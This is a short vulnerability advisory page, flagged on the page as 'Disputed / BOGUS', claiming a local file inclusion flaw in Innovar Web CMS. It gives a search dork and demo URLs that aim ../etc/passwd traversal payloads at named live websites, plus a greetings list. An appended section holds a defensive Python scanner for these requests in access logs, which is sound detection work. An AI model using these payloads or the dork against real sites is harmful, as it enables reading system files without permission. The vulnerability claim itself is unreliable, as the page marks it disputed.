Disputed / BOGUS

Innovar Web CMS Local File Inclusion Vulnerability

Published: 2012.11.10
Credit: Ashiyane Digital Security Team
Risk: Medium
CWE: CWE-98
CVE: N/A
Local: No
Remote: Yes
Dork: intext:"Desarrollado por Innovar Web"

-=-=-=-=-=- In The Name Of God -=-=-=-=-=-

--------------------------------------------------------------------------------
@ Innovar Web CMS Local File Inclusion Vulnerability
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
# Name: Innovar Web CMS Local File Inclusion Vulnerability
# Vendor: http://www.innovarweb.com.ar/
# Date: 2012-10-22
# Author: Ashiyane Digital Security Team
# Thanks to: 1337day.com,cxsecurity.com,packetstormsecurity.org
# Home: www.ashiyane.org/forums/
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[+] Dork: intext:"Desarrollado por Innovar Web"
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[+] Vulnerability ~>

[+] Vulnerability: http://127.0.0.1/path/index.php?cdo=[Include]

[+] Demo(s) :

[+] http://www.westingcapitalinc.com/index.php?cdo=../../../../../../etc/passwd

[+] http://www.suspensioncarlitos.com.ar/index.php?cdo=../../../../../../etc/passwd

[+] http://www.ojalatesirva.com.ar/interior/index.php?cdo=../../../../../../etc/passwd

===========================================================================
@ Gr33tz:
@ Ashiyane Members :
@ Behrooz_Ice,Q7,Virangar,Iman_taktaz,Keivan,Ali_eagle,ruin3r,Hijacker,Rz04
@ PrinceOfHacking,elvator,unique2world,HidDeEn,Encoder,N4H,Classic,Zend
@ Angel--D3m0n,Azad™,HashoR,Pr0grammer,Unline


And All Ashiyane Bug ResearcherS
===========================================================================

ASHIYANE DIGITAL SECURITY TEAM

Persian Gulf F0r Ever

WE LOVE IRAN

<<./By MojiRider >>
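
A defender-side check for the request pattern reported above, added here as an example and not part of the original advisory: it scans web server access logs for `cdo` values that contain traversal sequences, absolute paths, null bytes or URL schemes. The combined log format, the sample log lines and the page name `contacto` are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

PARAM = "cdo"  # query parameter named in the advisory
# Client IP, request target and status from a combined-format log line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding, bounded so hostile input cannot loop."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return why a cdo value is suspicious, or None if it looks benign."""
    v = fully_decode(value).replace("\\", "/")
    if "\x00" in v:
        return "null byte"
    if SCHEME_RE.match(v):
        return "URL or stream wrapper"
    if v.startswith("/"):
        return "absolute path"
    if ".." in v.split("/"):
        return "directory traversal"
    return None

def scan(lines):
    """Return (client_ip, status, reason) for each suspicious cdo request."""
    hits = []
    for m in filter(None, map(LOG_RE.match, lines)):
        ip, target, status = m.groups()
        for value in parse_qs(urlsplit(target).query).get(PARAM, []):
            reason = classify(value)
            if reason:
                hits.append((ip, int(status), reason))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up page name).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Nov/2012:10:00:01 +0000] "GET /index.php?cdo=contacto HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Nov/2012:10:00:05 +0000] "GET /index.php?cdo=../../../../../../etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.7 - - [10/Nov/2012:10:00:09 +0000] "GET /index.php?cdo=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 312',
]
```

A hit shows that the reported request pattern was sent, not that a file was included; the response status and size help decide which hits to triage first.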

References:

http://www.innovarweb.com.ar/
http://cxsecurity.com/issue/WLB-2012090008



Copyright 2017, cxsecurity.com